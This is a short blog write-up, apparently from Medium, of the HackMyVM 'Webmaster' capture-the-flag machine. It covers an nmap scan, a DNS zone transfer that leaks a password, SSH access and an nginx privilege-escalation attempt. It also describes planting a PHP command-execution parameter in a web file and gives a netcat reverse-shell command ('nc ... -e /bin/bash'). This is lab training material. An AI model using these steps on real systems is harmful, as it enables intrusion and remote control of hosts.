HackMyVM-Webmaster

ARZ101
3 min readJan 10, 2021

--

Netdiscover

NMAP

Nmap scan report for 192.168.1.131                                                                                                            [4/84]
Host is up (0.000055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
| 256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_ 256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open domain (unknown banner: not currently available)
| dns-nsid:
|_ bind.version: not currently available
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ currently available
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5FFB65ED%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,52,"\0P\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x18\x17not\x20curren
SF:tly\x20available\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:FE:8A:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.04 seconds

PORT 80

Looking at the source

PORT 53

So this webmaster.hmv refers to a domain name let's add this to /etc/hosts.

Now by adding the domain name we are going to do a Zone transfer which is a DNS query type AXFR, is a type of DNS transaction.Zone transfers are typically used to replicate DNS data across a number of DNS servers or to back up DNS files.

We got john's passwords so now let's ssh into the machine.

By running sudo -l we can see what can we run as root user

We can find an LPE (Local Privilege Escalation) for nginx

Let’s download this to our machine and transfer it to target machine

To run this we need to provide the path of nginx error log which is located at /var/log/nginx/error.log

Run this like ./40768.sh /var/log/nginx/error.log

But we couldn’t run the exploit has it is needed to be run as www-data so only thing I could thing was to change the contents of one of the webserver files and insert a simple php GET paramter vulnerable code which will allow us to execute commands

Then you can just do nc your_ip your_netcat_port -e /bin/bash on cmd paramter to get reverse shell

--

--

ARZ101
ARZ101

Written by ARZ101

Smol Pentester| OSCP | CTF Player | UwU

No responses yet